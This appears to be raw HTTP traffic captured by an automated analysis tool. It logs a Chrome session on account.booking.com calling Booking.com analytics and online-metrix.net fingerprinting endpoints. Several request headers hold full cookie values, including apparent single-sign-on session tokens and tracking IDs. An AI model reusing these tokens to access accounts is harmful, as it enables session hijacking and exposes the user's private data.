Source: global traffic	HTTP traffic detected: GET /dkWonjDP5qr1YyuK?6ca04d59bb62fae8=9D4nqPJo1npmM3GgzwXwxTgrJeA2xXWuGgRr2BLd-Xuo_I_zsejkc4Pyl2zvEB44ha_4d8D2I7_SlY16LDpCSmNnAmjsalryVpcBiQ9_dH22EQq85XwkKr7v9jSXOfr-nCz7Jmsdj8JrSik4olQrUxx2z7PDJlNkkIUR8jA HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe
Source: global traffic	HTTP traffic detected: GET /npxM9Mxg-ZvxuQd1?7facb5bcd3618508=fHLD1vuMpneVYTyLIKszc3q8066owWrnxPht88wfCTpUQVNn_l-_Joz-QN9jRKrP_GVVDUj4R7-smUaiGDWgRQFbpcEBGxVIHQX15wdlz4YuHAam9W6_fGZkIYsr6w8pJdb0fFrXC1zDviLnyJJtsk2MpEWY2RP3F3uMBz0 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe
Source: global traffic	HTTP traffic detected: GET /hAPGxdnZhOayAk1a?46fc43bebbd9e7d2=ffYTWqEK8xF1ze6z2-zAScKHFaWJa6WQIZ0pobzH33KxSWOJ5w-PoYe5pnPeFacDME-lhU1TuO3uNGYXAEDHA0vFkYlvhNX6YydO4jW3SJ5jUYr81I9rQiY12iKr8tXMqLX5z-9QOn0SFrHr74PGbHWlkSpFMRzSVmiCS11LWbVtLThAvJVp1GUKBfK1ojDJFFs7fLxegxcxOdS42NM HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe
Source: global traffic	HTTP traffic detected: GET /BPnuUceB1Qtz5LXA?2f53fab5fbea186a=Ep-le9FsUGwdi1RE5kHRAgi88cNBNRVjQs9ob9lUAGk1C0zkQen1jPHUVCQn3cef5Azkca_OskmteqlpUJIBAcSoydlPFXS4jqpoeSj7o1ytf_oQhxiAM36L-xkhRTMtTP8vpGIN78mwp0q0iw4kderfjxdtUxEeSlTya0ySBmaxTOQr7Ni5r5T21PimyJKtCSAzIRw2SDpjoa7WhWdu HTTP/1.1Host: h.online-metrix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /hiPwqVF5Vb9dfkfW?0a5f384e4a3bb289=MeXeCQxuys-oM8zj0-eawIt6vYXNw2ZXP6oAwZ_1GG8gTmrR0Gjzn1TyvQXoYXlKZVaQUn_QDiNJv_B1O8xb3qnPGPrn5ggkcbi-Lea2crS5w2tbgB3n7laRH266SZx0ismrLOLTRHtEICbAmE3UngxfxkYPQ5JnpKb6JfJ2KCSM0k8wM0l0SGzoAulG5E3uZ4bXI3Txaesth_YvZ9wI HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe
Source: global traffic	HTTP traffic detected: GET /fp/clear.png HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /, doregtzf/10e9fc93386172a1b2cf23ab-75aa-400a-9277-1849f1de255fsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://account.booking.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cONOaUW_MaTaPTQp?2e1a0b4cbc522f96=mxkiJZlKo2wRjNiek2jZRzrl9JXTLq7oVhtCJC5nwvUwLhK_9Uq0McCrlMcWg__-Gw_E7xzFmpdSYn5-UZqd8quKCKbLIchJ-2hYtZvhiPm-6HXb7Vdz8tUj-Y3D7aqj5Y4EuObcYrLKntbB8w30AM-2sxSUkKugcwx1EFMCPVFqlro HTTP/1.1Host: h.online-metrix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uJG23vokgQnONqdB?ae14fd71b07361dc=QqLa1XvNtL3IDPg5hwcH6441n6G3th71NMAKPs37sb-oi88Ezhwben-4ntJlHfu6d-ZKvPmw9Ou-1Q4eIaghjrUJvdnVI4fEULGqEky6ENIRiSv5ZNCNbFV9HiPQFUV_hioiDI56937AWp-BK6pnp4Krr0M&jb=3134246e71633d3a39643239643c666637633f3c303136303439336a3235356431336232326037 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe
Source: global traffic	HTTP traffic detected: GET /4MDCR2W4OfxcqhD3?f8cd79fb8e710843=G2DG5A2hEjLvcwImBdrkdpNdyNDk-K-PRfWAgJLomGWx6jgj0JY_71RwJR_vF5W38vIiprL5j8fFhTwvT3AltIpXtND-k6vN76xpouASsF2EGit4Vq5lyNFoVY0rpnu8n5jM-s4CaEKv9fpbvVfRWg HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe
Source: global traffic	HTTP traffic detected: GET /uJG23vokgQnONqdB?ae14fd71b07361dc=QqLa1XvNtL3IDPg5hwcH6441n6G3th71NMAKPs37sb-oi88Ezhwben-4ntJlHfu6d-ZKvPmw9Ou-1Q4eIaghjrUJvdnVI4fEULGqEky6ENIRiSv5ZNCNbFV9HiPQFUV_hioiDI56937AWp-BK6pnp4Krr0M&ja=303331332424633f2531303026723d3630266e3533303a387839303a362661663f31323a327a3b3a3624737a713f3078302e6470723d392433303a382c39303a362c31323a302c3b3a362e33303a302e3132372c313a38302c39303c2e322e38266574353037663533643333363b67346064323231603636626c3338376238696431613c26656e3530267363663d3236246e6a3f6a7674727b273341253a46253246696b616d7766742662676d6b696e652e636d6f273044716b676c256b6e25334e6f705f746763676c273b444d675e74595856326143497b43536d574c6c6d3b4f6d39495c32517a4e633d774c31787245334a72636d67514357443366456a74616d6e3e58526f6169485230634045344e7b3168524739726269356b62323b706355376c4e6d4c7e60533871476e736959505e32634431686c485a6e6258423258326e694b686d6b4d4450624c324a68524455744e725d785b6b3830526a59784c5745784e474f764d4647375b544f3b4c7a6b7952444e6b4966387b49323d35466c786c554670475155767558476e33543236395757784e5c30557a4f402e726e3f3d2678683567383032666661373737333b316434676a673839393b656234613131303b326c26606835633564633462656431643b313a3a30303c3a3938336e613865616e6e6037363c266273673f57696e666f77712730323332246a716a3f436872676d6525323839333524627367753555696e646d777324687160773f416870676f65266e60633d3426666c6f3f3a2e6e6574783f30267478643d436f67706b616325304e4c65775f516f726b266569766a70353438303b66316332606563323067346161373632383a3261643935353430396e66363730383934396636656163323466613b3663646064353a3131333131366126647a356a767678732d33492732462530467775752c656d6d656c6726616f6d253a4626703d786477656b665f6e6c69716825354766616e716723726e77676b665d77696e6c6f77735f656d666b635770646171677225354766616e716723726e77676b665d61646f6a655f61637a676063762d354d66696e736521726c75656b6c5d73776b63697c6b6d65253d4566616c7b6d23726e7d67616e5771686f63697761746727374764636c716d23706c756f696e5f726d696e726e69796d722d374566616e736523726e77656b6c5f7464615f706c69796572253d4d64636e7b652970647767696e5d646574636e747027374564696e736521786c7567696657717465577661657f677225354766616e716723726e77676b665d6a6176692535456669647167246f6c576335756562676e576560454e273032332e322d3030284f78656e474c2d3a3247512d32383226322532304168726d6f6b776f2b5565604f4e2532304f4c534c253a384751273a30392e38273230284d70656c454e2730324753273a32474c5344253230455b2d30323326302d32384168726f6f69756f2b556760496b74556d604b69742d323057656a4f4e434c4f4c4d5f616c7374616c6365665d637070637b73273b402532304d58545f62646d6c665d6569666d697a253342273230475a565d616d6e6f7057607566666d725f6861646e5d646e67617c253b402532304758545d646e6d63765d626e6d6c6425334a25323045505c5d6470696757646d727468253142253032475a565d7168636c67725f746d787475726d576e6d662d334a253a324558545d74657a767770675d616f6f7870657373616f6e5f62787c6127314a253a304d5a545f746778747770675d616d6f70706d7173696f665f7267746b2d3140273a304d585c5d746578767572675d646b6e7667725d696c69736f7c726f70696b2d3140273a304d585c5d735247402533402730324d47515f6764676d656e7c5f696e646d705d776b66742d334a2732304f47
Source: global traffic	HTTP traffic detected: GET /RD9HL007e46C3WGe?c32b45cf8993650f=avyRG4p81KT95-Ym5AUMs3yFlDEB7ZprSPww7YF5JauElJxIyOaofAUTVOLwcH3ahdva_0My8zQXgKtwRvDTQusDgRyHl9SMznec9pTmgzFpoZamgtNzzKZjbNebIPbdT_dkECdN59-LG2AarCeg4C0k1D8&jf=3134246e71603d3b693b3237666931363333393c643b37693231363a3a64353831343036636031 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://asanalytics.booking.com/hAPGxdnZhOayAk1a?46fc43bebbd9e7d2=ffYTWqEK8xF1ze6z2-zAScKHFaWJa6WQIZ0pobzH33KxSWOJ5w-PoYe5pnPeFacDME-lhU1TuO3uNGYXAEDHA0vFkYlvhNX6YydO4jW3SJ5jUYr81I9rQiY12iKr8tXMqLX5z-9QOn0SFrHr74PGbHWlkSpFMRzSVmiCS11LWbVtLThAvJVp1GUKBfK1ojDJFFs7fLxegxcxOdS42NMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /tRiiXHEmIqNegjtq?a396bac59516b37b=yut9XiYvNu1a0saso0D8UOEJZmREOB-kKjFnR6hSICcm6AaBGZBAhDgMFsQeNeh5v1heV2H-dcSytKYnO3Yj62cU4xHh7S9Gs9jmXfPUxb7nZAawMMVYCzDuQqCB9F9XqYJsJNsdW2WAh1P8exTdXQ&fr HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://asanalytics.booking.com/hAPGxdnZhOayAk1a?46fc43bebbd9e7d2=ffYTWqEK8xF1ze6z2-zAScKHFaWJa6WQIZ0pobzH33KxSWOJ5w-PoYe5pnPeFacDME-lhU1TuO3uNGYXAEDHA0vFkYlvhNX6YydO4jW3SJ5jUYr81I9rQiY12iKr8tXMqLX5z-9QOn0SFrHr74PGbHWlkSpFMRzSVmiCS11LWbVtLThAvJVp1GUKBfK1ojDJFFs7fLxegxcxOdS42NMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /4Wb3ut6NN8_WiBy8?172a921e015d11ed=25ISPwcECDXyXA2uY_Ds7QUIhpe2ehHS81TptGMR89bYsarl5mn036qA8B-_TM_SUKqVen4EU5Bhn6DuFkiY0DLRAb_Pj3LCHgxqyomQvEr6hFi7YDeMut-GZNmKxewvbZ19pX2uEABMCO5MnUbexkomwhMQwMf3 HTTP/1.1Host: h64.online-metrix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /9X-x-NDGSerp2PLg?22ab6c892ffc43b9=hoXhKVYdUQwXlj_Nu0fjLEdAVntPilcIHPv8eEjKFw-ZTPLMcetRTxf6ep1fpjr7zZHuL96g_D23L26VTXHQHpY6aQIkGNMIFq3j5QEoc2dWTxbTJxPi7MRfButmvDYxAD_6SGHOZ3tj5J9R4LYLbbJgL-MgR71hLgsCGLiPP8eAag4PI09W6FZAph_hSsttSAseFGRzIjO0hdrbuyY&jf=36333424716b645d7a6c643d746c725f6c46433a32524b4c3662465d4d327230247369665d666376673f31353b353338303b30362673616c5d767b786535776d603a656366736124716b665d6967793f3b323539333831333036383f30633a3e3430636d3164303232313034323a30633a34343a6b673364303b30313037383b36303238303c3030313334356633306734666333606365326e3438393338303631613c3a64313439396e316c613938343b666430303b36333130383239346535366e62376362313d3037676e373b623b3b3936363465393437316066366635373d636238626d34633037306c30603b6a35303231613262343b303333316067353b3537333b362673696c5f736967353b32363738323a3138326237383a34343b34666430303561373b3b3264383e336434353b3e66613b6d656a6569313765396665646160303b616661343269676335303038636239383b6332303a303f316e6762306137366467303467356067313030366438613f616432663b6a366366693431366c676636623b37613b666667373b3b6263383662343569613033267b6164703f39 HTTP/1.1Host: h.online-metrix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://h.online-metrix.net/BPnuUceB1Qtz5LXA?2f53fab5fbea186a=Ep-le9FsUGwdi1RE5kHRAgi88cNBNRVjQs9ob9lUAGk1C0zkQen1jPHUVCQn3cef5Azkca_OskmteqlpUJIBAcSoydlPFXS4jqpoeSj7o1ytf_oQhxiAM36L-xkhRTMtTP8vpGIN78mwp0q0iw4kderfjxdtUxEeSlTya0ySBmaxTOQr7Ni5r5T21PimyJKtCSAzIRw2SDpjoa7WhWduAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
